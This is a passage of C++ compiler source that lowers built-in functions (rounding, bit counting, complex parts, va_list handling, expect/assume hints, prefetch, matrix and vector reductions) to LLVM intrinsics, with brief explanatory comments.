case Builtin::BI__builtin_sqrtf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::sqrt,
Intrinsic::experimental_constrained_sqrt));
case Builtin::BItrunc:
case Builtin::BItruncf:
case Builtin::BItruncl:
case Builtin::BI__builtin_trunc:
case Builtin::BI__builtin_truncf:
case Builtin::BI__builtin_truncf16:
case Builtin::BI__builtin_truncl:
case Builtin::BI__builtin_truncf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::trunc,
Intrinsic::experimental_constrained_trunc));
case Builtin::BIlround:
case Builtin::BIlroundf:
case Builtin::BIlroundl:
case Builtin::BI__builtin_lround:
case Builtin::BI__builtin_lroundf:
case Builtin::BI__builtin_lroundl:
case Builtin::BI__builtin_lroundf128:
return RValue::get(emitMaybeConstrainedFPToIntRoundBuiltin(
*this, E, Intrinsic::lround,
Intrinsic::experimental_constrained_lround));
case Builtin::BIllround:
case Builtin::BIllroundf:
case Builtin::BIllroundl:
case Builtin::BI__builtin_llround:
case Builtin::BI__builtin_llroundf:
case Builtin::BI__builtin_llroundl:
case Builtin::BI__builtin_llroundf128:
return RValue::get(emitMaybeConstrainedFPToIntRoundBuiltin(
*this, E, Intrinsic::llround,
Intrinsic::experimental_constrained_llround));
case Builtin::BIlrint:
case Builtin::BIlrintf:
case Builtin::BIlrintl:
case Builtin::BI__builtin_lrint:
case Builtin::BI__builtin_lrintf:
case Builtin::BI__builtin_lrintl:
case Builtin::BI__builtin_lrintf128:
return RValue::get(emitMaybeConstrainedFPToIntRoundBuiltin(
*this, E, Intrinsic::lrint,
Intrinsic::experimental_constrained_lrint));
case Builtin::BIllrint:
case Builtin::BIllrintf:
case Builtin::BIllrintl:
case Builtin::BI__builtin_llrint:
case Builtin::BI__builtin_llrintf:
case Builtin::BI__builtin_llrintl:
case Builtin::BI__builtin_llrintf128:
return RValue::get(emitMaybeConstrainedFPToIntRoundBuiltin(
*this, E, Intrinsic::llrint,
Intrinsic::experimental_constrained_llrint));
default:
break;
}
}
switch (BuiltinIDIfNoAsmLabel) {
default: break;
case Builtin::BI__builtin___CFStringMakeConstantString:
case Builtin::BI__builtin___NSStringMakeConstantString:
return RValue::get(ConstantEmitter(*this).emitAbstract(E, E->getType()));
case Builtin::BI__builtin_stdarg_start:
case Builtin::BI__builtin_va_start:
case Builtin::BI__va_start:
case Builtin::BI__builtin_va_end:
return RValue::get(
EmitVAStartEnd(BuiltinID == Builtin::BI__va_start
? EmitScalarExpr(E->getArg(0))
: EmitVAListRef(E->getArg(0)).getPointer(),
BuiltinID != Builtin::BI__builtin_va_end));
case Builtin::BI__builtin_va_copy: {
Value *DstPtr = EmitVAListRef(E->getArg(0)).getPointer();
Value *SrcPtr = EmitVAListRef(E->getArg(1)).getPointer();
llvm::Type *Type = Int8PtrTy;
DstPtr = Builder.CreateBitCast(DstPtr, Type);
SrcPtr = Builder.CreateBitCast(SrcPtr, Type);
return RValue::get(Builder.CreateCall(CGM.getIntrinsic(Intrinsic::vacopy),
{DstPtr, SrcPtr}));
}
case Builtin::BI__builtin_abs:
case Builtin::BI__builtin_labs:
case Builtin::BI__builtin_llabs: {
// X < 0 ? -X : X
// The negation has 'nsw' because abs of INT_MIN is undefined.
Value *ArgValue = EmitScalarExpr(E->getArg(0));
Value *NegOp = Builder.CreateNSWNeg(ArgValue, "neg");
Constant *Zero = llvm::Constant::getNullValue(ArgValue->getType());
Value *CmpResult = Builder.CreateICmpSLT(ArgValue, Zero, "abscond");
Value *Result = Builder.CreateSelect(CmpResult, NegOp, ArgValue, "abs");
return RValue::get(Result);
}
case Builtin::BI__builtin_complex: {
Value *Real = EmitScalarExpr(E->getArg(0));
Value *Imag = EmitScalarExpr(E->getArg(1));
return RValue::getComplex({Real, Imag});
}
case Builtin::BI__builtin_conj:
case Builtin::BI__builtin_conjf:
case Builtin::BI__builtin_conjl:
case Builtin::BIconj:
case Builtin::BIconjf:
case Builtin::BIconjl: {
ComplexPairTy ComplexVal = EmitComplexExpr(E->getArg(0));
Value *Real = ComplexVal.first;
Value *Imag = ComplexVal.second;
Imag = Builder.CreateFNeg(Imag, "neg");
return RValue::getComplex(std::make_pair(Real, Imag));
}
case Builtin::BI__builtin_creal:
case Builtin::BI__builtin_crealf:
case Builtin::BI__builtin_creall:
case Builtin::BIcreal:
case Builtin::BIcrealf:
case Builtin::BIcreall: {
ComplexPairTy ComplexVal = EmitComplexExpr(E->getArg(0));
return RValue::get(ComplexVal.first);
}
case Builtin::BI__builtin_dump_struct: {
llvm::Type *LLVMIntTy = getTypes().ConvertType(getContext().IntTy);
llvm::FunctionType *LLVMFuncType = llvm::FunctionType::get(
LLVMIntTy, {llvm::Type::getInt8PtrTy(getLLVMContext())}, true);
Value *Func = EmitScalarExpr(E->getArg(1)->IgnoreImpCasts());
CharUnits Arg0Align = EmitPointerWithAlignment(E->getArg(0)).getAlignment();
const Expr *Arg0 = E->getArg(0)->IgnoreImpCasts();
QualType Arg0Type = Arg0->getType()->getPointeeType();
Value *RecordPtr = EmitScalarExpr(Arg0);
Value *Res = dumpRecord(*this, Arg0Type, RecordPtr, Arg0Align,
{LLVMFuncType, Func}, 0);
return RValue::get(Res);
}
case Builtin::BI__builtin_preserve_access_index: {
    // Only enable the preserved-access-index region when debug info is
    // available, as debug info is needed to preserve the user-level access
    // pattern.
if (!getDebugInfo()) {
CGM.Error(E->getExprLoc(), "using builtin_preserve_access_index() without -g");
return RValue::get(EmitScalarExpr(E->getArg(0)));
}
    // Nested builtin_preserve_access_index() is not supported.
if (IsInPreservedAIRegion) {
CGM.Error(E->getExprLoc(), "nested builtin_preserve_access_index() not supported");
return RValue::get(EmitScalarExpr(E->getArg(0)));
}
IsInPreservedAIRegion = true;
Value *Res = EmitScalarExpr(E->getArg(0));
IsInPreservedAIRegion = false;
return RValue::get(Res);
}
case Builtin::BI__builtin_cimag:
case Builtin::BI__builtin_cimagf:
case Builtin::BI__builtin_cimagl:
case Builtin::BIcimag:
case Builtin::BIcimagf:
case Builtin::BIcimagl: {
ComplexPairTy ComplexVal = EmitComplexExpr(E->getArg(0));
return RValue::get(ComplexVal.second);
}
case Builtin::BI__builtin_clrsb:
case Builtin::BI__builtin_clrsbl:
case Builtin::BI__builtin_clrsbll: {
    // clrsb(x) -> clz(x < 0 ? ~x : x) - 1
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, ArgType);
llvm::Type *ResultType = ConvertType(E->getType());
Value *Zero = llvm::Constant::getNullValue(ArgType);
Value *IsNeg = Builder.CreateICmpSLT(ArgValue, Zero, "isneg");
Value *Inverse = Builder.CreateNot(ArgValue, "not");
Value *Tmp = Builder.CreateSelect(IsNeg, Inverse, ArgValue);
Value *Ctlz = Builder.CreateCall(F, {Tmp, Builder.getFalse()});
Value *Result = Builder.CreateSub(Ctlz, llvm::ConstantInt::get(ArgType, 1));
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__builtin_ctzs:
case Builtin::BI__builtin_ctz:
case Builtin::BI__builtin_ctzl:
case Builtin::BI__builtin_ctzll: {
Value *ArgValue = EmitCheckedArgForBuiltin(E->getArg(0), BCK_CTZPassedZero);
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::cttz, ArgType);
llvm::Type *ResultType = ConvertType(E->getType());
Value *ZeroUndef = Builder.getInt1(getTarget().isCLZForZeroUndef());
Value *Result = Builder.CreateCall(F, {ArgValue, ZeroUndef});
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__builtin_clzs:
case Builtin::BI__builtin_clz:
case Builtin::BI__builtin_clzl:
case Builtin::BI__builtin_clzll: {
Value *ArgValue = EmitCheckedArgForBuiltin(E->getArg(0), BCK_CLZPassedZero);
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, ArgType);
llvm::Type *ResultType = ConvertType(E->getType());
Value *ZeroUndef = Builder.getInt1(getTarget().isCLZForZeroUndef());
Value *Result = Builder.CreateCall(F, {ArgValue, ZeroUndef});
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__builtin_ffs:
case Builtin::BI__builtin_ffsl:
case Builtin::BI__builtin_ffsll: {
// ffs(x) -> x ? cttz(x) + 1 : 0
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::cttz, ArgType);
llvm::Type *ResultType = ConvertType(E->getType());
Value *Tmp =
Builder.CreateAdd(Builder.CreateCall(F, {ArgValue, Builder.getTrue()}),
llvm::ConstantInt::get(ArgType, 1));
Value *Zero = llvm::Constant::getNullValue(ArgType);
Value *IsZero = Builder.CreateICmpEQ(ArgValue, Zero, "iszero");
Value *Result = Builder.CreateSelect(IsZero, Zero, Tmp, "ffs");
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__builtin_parity:
case Builtin::BI__builtin_parityl:
case Builtin::BI__builtin_parityll: {
// parity(x) -> ctpop(x) & 1
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::ctpop, ArgType);
llvm::Type *ResultType = ConvertType(E->getType());
Value *Tmp = Builder.CreateCall(F, ArgValue);
Value *Result = Builder.CreateAnd(Tmp, llvm::ConstantInt::get(ArgType, 1));
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__lzcnt16:
case Builtin::BI__lzcnt:
case Builtin::BI__lzcnt64: {
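// MSVC __lzcnt maps to ctlz with zero defined (getFalse), so __lzcnt(0)
// yields the operand's bit width.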
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, ArgType);
llvm::Type *ResultType = ConvertType(E->getType());
Value *Result = Builder.CreateCall(F, {ArgValue, Builder.getFalse()});
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__popcnt16:
case Builtin::BI__popcnt:
case Builtin::BI__popcnt64:
case Builtin::BI__builtin_popcount:
case Builtin::BI__builtin_popcountl:
case Builtin::BI__builtin_popcountll: {
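// popcount(x) -> ctpop(x), int-cast to the builtin's result type if needed.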
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::ctpop, ArgType);
llvm::Type *ResultType = ConvertType(E->getType());
Value *Result = Builder.CreateCall(F, ArgValue);
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__builtin_unpredictable: {
// Always return the argument of __builtin_unpredictable. LLVM does not
// handle this builtin. Metadata for this builtin should be added directly
// to instructions such as branches or switches that use it.
return RValue::get(EmitScalarExpr(E->getArg(0)));
}
case Builtin::BI__builtin_expect: {
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Value *ExpectedValue = EmitScalarExpr(E->getArg(1));
// Don't generate llvm.expect on -O0 as the backend won't use it for
// anything.
// Note, we still IRGen ExpectedValue because it could have side-effects.
if (CGM.getCodeGenOpts().OptimizationLevel == 0)
return RValue::get(ArgValue);
Function *FnExpect = CGM.getIntrinsic(Intrinsic::expect, ArgType);
Value *Result =
Builder.CreateCall(FnExpect, {ArgValue, ExpectedValue}, "expval");
return RValue::get(Result);
}
case Builtin::BI__builtin_expect_with_probability: {
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Value *ExpectedValue = EmitScalarExpr(E->getArg(1));
llvm::APFloat Probability(0.0);
const Expr *ProbArg = E->getArg(2);
bool EvalSucceed = ProbArg->EvaluateAsFloat(Probability, CGM.getContext());
assert(EvalSucceed && "probability should be able to evaluate as float");
(void)EvalSucceed;
bool LoseInfo = false;
Probability.convert(llvm::APFloat::IEEEdouble(),
llvm::RoundingMode::Dynamic, &LoseInfo);
llvm::Type *Ty = ConvertType(ProbArg->getType());
Constant *Confidence = ConstantFP::get(Ty, Probability);
// Don't generate llvm.expect.with.probability on -O0 as the backend
// won't use it for anything.
// Note, we still IRGen ExpectedValue because it could have side-effects.
if (CGM.getCodeGenOpts().OptimizationLevel == 0)
return RValue::get(ArgValue);
Function *FnExpect =
CGM.getIntrinsic(Intrinsic::expect_with_probability, ArgType);
Value *Result = Builder.CreateCall(
FnExpect, {ArgValue, ExpectedValue, Confidence}, "expval");
return RValue::get(Result);
}
case Builtin::BI__builtin_assume_aligned: {
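// Emit an alignment assumption for the pointer argument and return the
// pointer unchanged; over-large alignments are clamped to
// llvm::Value::MaximumAlignment below.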
const Expr *Ptr = E->getArg(0);
Value *PtrValue = EmitScalarExpr(Ptr);
Value *OffsetValue =
(E->getNumArgs() > 2) ? EmitScalarExpr(E->getArg(2)) : nullptr;
Value *AlignmentValue = EmitScalarExpr(E->getArg(1));
ConstantInt *AlignmentCI = cast<ConstantInt>(AlignmentValue);
if (AlignmentCI->getValue().ugt(llvm::Value::MaximumAlignment))
AlignmentCI = ConstantInt::get(AlignmentCI->getType(),
llvm::Value::MaximumAlignment);
emitAlignmentAssumption(PtrValue, Ptr,
/*The expr loc is sufficient.*/ SourceLocation(),
AlignmentCI, OffsetValue);
return RValue::get(PtrValue);
}
case Builtin::BI__assume:
case Builtin::BI__builtin_assume: {
if (E->getArg(0)->HasSideEffects(getContext()))
return RValue::get(nullptr);
Value *ArgValue = EmitScalarExpr(E->getArg(0));
Function *FnAssume = CGM.getIntrinsic(Intrinsic::assume);
return RValue::get(Builder.CreateCall(FnAssume, ArgValue));
}
case Builtin::BI__arithmetic_fence: {
// Create the builtin call if FastMath is selected, and the target
// supports the builtin, otherwise just return the argument.
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
llvm::FastMathFlags FMF = Builder.getFastMathFlags();
bool isArithmeticFenceEnabled =
FMF.allowReassoc() &&
getContext().getTargetInfo().checkArithmeticFenceSupported();
QualType ArgType = E->getArg(0)->getType();
if (ArgType->isComplexType()) {
if (isArithmeticFenceEnabled) {
QualType ElementType = ArgType->castAs<ComplexType>()->getElementType();
ComplexPairTy ComplexVal = EmitComplexExpr(E->getArg(0));
Value *Real = Builder.CreateArithmeticFence(ComplexVal.first,
ConvertType(ElementType));
Value *Imag = Builder.CreateArithmeticFence(ComplexVal.second,
ConvertType(ElementType));
return RValue::getComplex(std::make_pair(Real, Imag));
}
ComplexPairTy ComplexVal = EmitComplexExpr(E->getArg(0));
Value *Real = ComplexVal.first;
Value *Imag = ComplexVal.second;
return RValue::getComplex(std::make_pair(Real, Imag));
}
Value *ArgValue = EmitScalarExpr(E->getArg(0));
if (isArithmeticFenceEnabled)
return RValue::get(
Builder.CreateArithmeticFence(ArgValue, ConvertType(ArgType)));
return RValue::get(ArgValue);
}
case Builtin::BI__builtin_bswap16:
case Builtin::BI__builtin_bswap32:
case Builtin::BI__builtin_bswap64: {
return RValue::get(emitUnaryBuiltin(*this, E, Intrinsic::bswap));
}
case Builtin::BI__builtin_bitreverse8:
case Builtin::BI__builtin_bitreverse16:
case Builtin::BI__builtin_bitreverse32:
case Builtin::BI__builtin_bitreverse64: {
return RValue::get(emitUnaryBuiltin(*this, E, Intrinsic::bitreverse));
}
case Builtin::BI__builtin_rotateleft8:
case Builtin::BI__builtin_rotateleft16:
case Builtin::BI__builtin_rotateleft32:
case Builtin::BI__builtin_rotateleft64:
case Builtin::BI_rotl8: // Microsoft variants of rotate left
case Builtin::BI_rotl16:
case Builtin::BI_rotl:
case Builtin::BI_lrotl:
case Builtin::BI_rotl64:
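// emitRotate lowers rotates to the funnel shift intrinsics
// (fshl for left rotates, fshr for right rotates).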
return emitRotate(E, false);
case Builtin::BI__builtin_rotateright8:
case Builtin::BI__builtin_rotateright16:
case Builtin::BI__builtin_rotateright32:
case Builtin::BI__builtin_rotateright64:
case Builtin::BI_rotr8: // Microsoft variants of rotate right
case Builtin::BI_rotr16:
case Builtin::BI_rotr:
case Builtin::BI_lrotr:
case Builtin::BI_rotr64:
return emitRotate(E, true);
case Builtin::BI__builtin_constant_p: {
llvm::Type *ResultType = ConvertType(E->getType());
const Expr *Arg = E->getArg(0);
QualType ArgType = Arg->getType();
// FIXME: The allowance for Obj-C pointers and block pointers is historical
// and likely a mistake.
if (!ArgType->isIntegralOrEnumerationType() && !ArgType->isFloatingType() &&
!ArgType->isObjCObjectPointerType() && !ArgType->isBlockPointerType())
// Per the GCC documentation, only numeric constants are recognized after
// inlining.
return RValue::get(ConstantInt::get(ResultType, 0));
if (Arg->HasSideEffects(getContext()))
// The argument is unevaluated, so be conservative if it might have
// side-effects.
return RValue::get(ConstantInt::get(ResultType, 0));
Value *ArgValue = EmitScalarExpr(Arg);
if (ArgType->isObjCObjectPointerType()) {
// Convert Objective-C objects to id because we cannot distinguish between
// LLVM types for Obj-C classes as they are opaque.
ArgType = CGM.getContext().getObjCIdType();
ArgValue = Builder.CreateBitCast(ArgValue, ConvertType(ArgType));
}
Function *F =
CGM.getIntrinsic(Intrinsic::is_constant, ConvertType(ArgType));
Value *Result = Builder.CreateCall(F, ArgValue);
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/false);
return RValue::get(Result);
}
case Builtin::BI__builtin_dynamic_object_size:
case Builtin::BI__builtin_object_size: {
unsigned Type =
E->getArg(1)->EvaluateKnownConstInt(getContext()).getZExtValue();
auto *ResType = cast<llvm::IntegerType>(ConvertType(E->getType()));
// We pass this builtin onto the optimizer so that it can figure out the
// object size in more complex cases.
bool IsDynamic = BuiltinID == Builtin::BI__builtin_dynamic_object_size;
return RValue::get(emitBuiltinObjectSize(E->getArg(0), Type, ResType,
/*EmittedE=*/nullptr, IsDynamic));
}
case Builtin::BI__builtin_prefetch: {
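// prefetch(addr, rw = 0, locality = 3): omitted arguments default to a
// read with maximal temporal locality; the trailing constant 1 selects
// the data (as opposed to instruction) cache.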
Value *Locality, *RW, *Address = EmitScalarExpr(E->getArg(0));
// FIXME: Technically these constants should be of type 'int', yes?
RW = (E->getNumArgs() > 1) ? EmitScalarExpr(E->getArg(1)) :
llvm::ConstantInt::get(Int32Ty, 0);
Locality = (E->getNumArgs() > 2) ? EmitScalarExpr(E->getArg(2)) :
llvm::ConstantInt::get(Int32Ty, 3);
Value *Data = llvm::ConstantInt::get(Int32Ty, 1);
Function *F = CGM.getIntrinsic(Intrinsic::prefetch, Address->getType());
return RValue::get(Builder.CreateCall(F, {Address, RW, Locality, Data}));
}
case Builtin::BI__builtin_readcyclecounter: {
Function *F = CGM.getIntrinsic(Intrinsic::readcyclecounter);
return RValue::get(Builder.CreateCall(F));
}
case Builtin::BI__builtin___clear_cache: {
Value *Begin = EmitScalarExpr(E->getArg(0));
Value *End = EmitScalarExpr(E->getArg(1));
Function *F = CGM.getIntrinsic(Intrinsic::clear_cache);
return RValue::get(Builder.CreateCall(F, {Begin, End}));
}
case Builtin::BI__builtin_trap:
return RValue::get(EmitTrapCall(Intrinsic::trap));
case Builtin::BI__debugbreak:
return RValue::get(EmitTrapCall(Intrinsic::debugtrap));
case Builtin::BI__builtin_unreachable: {
EmitUnreachable(E->getExprLoc());
// We do need to preserve an insertion point.
EmitBlock(createBasicBlock("unreachable.cont"));
return RValue::get(nullptr);
}
case Builtin::BI__builtin_powi:
case Builtin::BI__builtin_powif:
case Builtin::BI__builtin_powil: {
llvm::Value *Src0 = EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = EmitScalarExpr(E->getArg(1));
if (Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
Function *F = CGM.getIntrinsic(Intrinsic::experimental_constrained_powi,
Src0->getType());
return RValue::get(Builder.CreateConstrainedFPCall(F, { Src0, Src1 }));
}
Function *F = CGM.getIntrinsic(Intrinsic::powi,
{ Src0->getType(), Src1->getType() });
return RValue::get(Builder.CreateCall(F, { Src0, Src1 }));
}
case Builtin::BI__builtin_isgreater:
case Builtin::BI__builtin_isgreaterequal:
case Builtin::BI__builtin_isless:
case Builtin::BI__builtin_islessequal:
case Builtin::BI__builtin_islessgreater:
case Builtin::BI__builtin_isunordered: {
// Ordered comparisons: we know the arguments to these are matching scalar
// floating point values.
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
// FIXME: for strictfp/IEEE-754 we need to not trap on SNaN here.
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
switch (BuiltinID) {
default: llvm_unreachable("Unknown ordered comparison");
case Builtin::BI__builtin_isgreater:
LHS = Builder.CreateFCmpOGT(LHS, RHS, "cmp");
break;
case Builtin::BI__builtin_isgreaterequal:
LHS = Builder.CreateFCmpOGE(LHS, RHS, "cmp");
break;
case Builtin::BI__builtin_isless:
LHS = Builder.CreateFCmpOLT(LHS, RHS, "cmp");
break;
case Builtin::BI__builtin_islessequal:
LHS = Builder.CreateFCmpOLE(LHS, RHS, "cmp");
break;
case Builtin::BI__builtin_islessgreater:
LHS = Builder.CreateFCmpONE(LHS, RHS, "cmp");
break;
case Builtin::BI__builtin_isunordered:
LHS = Builder.CreateFCmpUNO(LHS, RHS, "cmp");
break;
}
// ZExt bool to int type.
return RValue::get(Builder.CreateZExt(LHS, ConvertType(E->getType())));
}
case Builtin::BI__builtin_isnan: {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
Value *V = EmitScalarExpr(E->getArg(0));
llvm::Type *Ty = V->getType();
const llvm::fltSemantics &Semantics = Ty->getFltSemantics();
if (!Builder.getIsFPConstrained() ||
Builder.getDefaultConstrainedExcept() == fp::ebIgnore ||
!Ty->isIEEE()) {
V = Builder.CreateFCmpUNO(V, V, "cmp");
return RValue::get(Builder.CreateZExt(V, ConvertType(E->getType())));
}
if (Value *Result = getTargetHooks().testFPKind(V, BuiltinID, Builder, CGM))
return RValue::get(Result);
// NaN has all exp bits set and a non-zero significand. Therefore:
// isnan(V) == ((exp mask - (abs(V) & exp mask)) < 0)
unsigned bitsize = Ty->getScalarSizeInBits();
llvm::IntegerType *IntTy = Builder.getIntNTy(bitsize);
Value *IntV = Builder.CreateBitCast(V, IntTy);
APInt AndMask = APInt::getSignedMaxValue(bitsize);
Value *AbsV =
Builder.CreateAnd(IntV, llvm::ConstantInt::get(IntTy, AndMask));
APInt ExpMask = APFloat::getInf(Semantics).bitcastToAPInt();
Value *Sub =
Builder.CreateSub(llvm::ConstantInt::get(IntTy, ExpMask), AbsV);
// V = sign bit of Sub, i.e. V = (Sub < 0)
V = Builder.CreateLShr(Sub, llvm::ConstantInt::get(IntTy, bitsize - 1));
if (bitsize > 32)
V = Builder.CreateTrunc(V, ConvertType(E->getType()));
return RValue::get(V);
}
case Builtin::BI__builtin_elementwise_abs: {
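// Integer (vector) operands use llvm.abs with the INT_MIN-is-poison flag
// off; floating-point operands use llvm.fabs.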
Value *Op0 = EmitScalarExpr(E->getArg(0));
Value *Result;
if (Op0->getType()->isIntOrIntVectorTy())
Result = Builder.CreateBinaryIntrinsic(
llvm::Intrinsic::abs, Op0, Builder.getFalse(), nullptr, "elt.abs");
else
Result = Builder.CreateUnaryIntrinsic(llvm::Intrinsic::fabs, Op0, nullptr,
"elt.abs");
return RValue::get(Result);
}
case Builtin::BI__builtin_elementwise_max: {
Value *Op0 = EmitScalarExpr(E->getArg(0));
Value *Op1 = EmitScalarExpr(E->getArg(1));
Value *Result;
if (Op0->getType()->isIntOrIntVectorTy()) {
QualType Ty = E->getArg(0)->getType();
if (auto *VecTy = Ty->getAs<VectorType>())
Ty = VecTy->getElementType();
Result = Builder.CreateBinaryIntrinsic(Ty->isSignedIntegerType()
? llvm::Intrinsic::smax
: llvm::Intrinsic::umax,
Op0, Op1, nullptr, "elt.max");
} else
Result = Builder.CreateMaxNum(Op0, Op1, "elt.max");
return RValue::get(Result);
}
case Builtin::BI__builtin_elementwise_min: {
Value *Op0 = EmitScalarExpr(E->getArg(0));
Value *Op1 = EmitScalarExpr(E->getArg(1));
Value *Result;
if (Op0->getType()->isIntOrIntVectorTy()) {
QualType Ty = E->getArg(0)->getType();
if (auto *VecTy = Ty->getAs<VectorType>())
Ty = VecTy->getElementType();
Result = Builder.CreateBinaryIntrinsic(Ty->isSignedIntegerType()
? llvm::Intrinsic::smin
: llvm::Intrinsic::umin,
Op0, Op1, nullptr, "elt.min");
} else
Result = Builder.CreateMinNum(Op0, Op1, "elt.min");
return RValue::get(Result);
}
case Builtin::BI__builtin_reduce_max: {
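// Pick vector_reduce_smax/umax for integer vectors based on element
// signedness, and vector_reduce_fmax for floating-point operands.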
auto GetIntrinsicID = [](QualType QT, llvm::Type *IrTy) {
if (IrTy->isIntOrIntVectorTy()) {
if (auto *VecTy = QT->getAs<VectorType>())
QT = VecTy->getElementType();
if (QT->isSignedIntegerType())
return llvm::Intrinsic::vector_reduce_smax;
else
return llvm::Intrinsic::vector_reduce_umax;
}
return llvm::Intrinsic::vector_reduce_fmax;
};
Value *Op0 = EmitScalarExpr(E->getArg(0));
Value *Result = Builder.CreateUnaryIntrinsic(
GetIntrinsicID(E->getArg(0)->getType(), Op0->getType()), Op0, nullptr,
"rdx.max");
return RValue::get(Result);
}
case Builtin::BI__builtin_reduce_min: {
auto GetIntrinsicID = [](QualType QT, llvm::Type *IrTy) {
if (IrTy->isIntOrIntVectorTy()) {
if (auto *VecTy = QT->getAs<VectorType>())
QT = VecTy->getElementType();
if (QT->isSignedIntegerType())
return llvm::Intrinsic::vector_reduce_smin;
else
return llvm::Intrinsic::vector_reduce_umin;
}
return llvm::Intrinsic::vector_reduce_fmin;
};
Value *Op0 = EmitScalarExpr(E->getArg(0));
Value *Result = Builder.CreateUnaryIntrinsic(
GetIntrinsicID(E->getArg(0)->getType(), Op0->getType()), Op0, nullptr,
"rdx.min");
return RValue::get(Result);
}
case Builtin::BI__builtin_matrix_transpose: {
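// Lower to the matrix transpose intrinsic, taking the row and column
// counts from the operand's static matrix type.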
const auto *MatrixTy = E->getArg(0)->getType()->getAs<ConstantMatrixType>();
Value *MatValue = EmitScalarExpr(E->getArg(0));
MatrixBuilder<CGBuilderTy> MB(Builder);
Value *Result = MB.CreateMatrixTranspose(MatValue, MatrixTy->getNumRows(),
MatrixTy->getNumColumns());
return RValue::get(Result);
}
case Builtin::BI__builtin_matrix_column_major_load: {
MatrixBuilder<CGBuilderTy> MB(Builder);
// Emit everything that isn't dependent on the first parameter type
Value *Stride = EmitScalarExpr(E->getArg(3));
const auto *ResultTy = E->getType()->getAs<ConstantMatrixType>();
auto *PtrTy = E->getArg(0)->getType()->getAs<PointerType>();
assert(PtrTy && "arg0 must be of pointer type");
bool IsVolatile = PtrTy->getPointeeType().isVolatileQualified();
Address Src = EmitPointerWithAlignment(E->getArg(0));
EmitNonNullArgCheck(RValue::get(Src.getPointer()), E->getArg(0)->getType(),
E->getArg(0)->getExprLoc(), FD, 0);
Value *Result = MB.CreateColumnMajorLoad(
Src.getPointer(), Align(Src.getAlignment().getQuantity()), Stride,
IsVolatile, ResultTy->getNumRows(), ResultTy->getNumColumns(),
"matrix");
return RValue::get(Result);
}
case Builtin::BI__builtin_matrix_column_major_store: {
MatrixBuilder<CGBuilderTy> MB(Builder);
Value *Matrix = EmitScalarExpr(E->getArg(0));
Address Dst = EmitPointerWithAlignment(E->getArg(1));
Value *Stride = EmitScalarExpr(E->getArg(2));
const auto *MatrixTy = E->getArg(0)->getType()->getAs<ConstantMatrixType>();
auto *PtrTy = E->getArg(1)->getType()->getAs<PointerType>();
assert(PtrTy && "arg1 must be of pointer type");
bool IsVolatile = PtrTy->getPointeeType().isVolatileQualified();
EmitNonNullArgCheck(RValue::get(Dst.getPointer()), E->getArg(1)->getType(),
E->getArg(1)->getExprLoc(), FD, 0);
Value *Result = MB.CreateColumnMajorStore(
Matrix, Dst.getPointer(), Align(Dst.getAlignment().getQuantity()),
Stride, IsVolatile, MatrixTy->getNumRows(), MatrixTy->getNumColumns());
return RValue::get(Result);
}
case Builtin::BIfinite:
case Builtin::BI__finite:
case Builtin::BIfinitef:
case Builtin::BI__finitef:
case Builtin::BIfinitel:
case Builtin::BI__finitel:
case Builtin::BI__builtin_isinf:
case Builtin::BI__builtin_isfinite: {
// isinf(x) --> fabs(x) == infinity
// isfinite(x) --> fabs(x) != infinity
// x != NaN via the ordered compare in either case.
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
Value *V = EmitScalarExpr(E->getArg(0));
llvm::Type *Ty = V->getType();
if (!Builder.getIsFPConstrained() ||
Builder.getDefaultConstrainedExcept() == fp::ebIgnore ||
!Ty->isIEEE()) {
Value *Fabs = EmitFAbs(*this, V);
Constant *Infinity = ConstantFP::getInfinity(V->getType());
CmpInst::Predicate Pred = (BuiltinID == Builtin::BI__builtin_isinf)
? CmpInst::FCMP_OEQ
: CmpInst::FCMP_ONE;
Value *FCmp = Builder.CreateFCmp(Pred, Fabs, Infinity, "cmpinf");
return RValue::get(Builder.CreateZExt(FCmp, ConvertType(E->getType())));
}
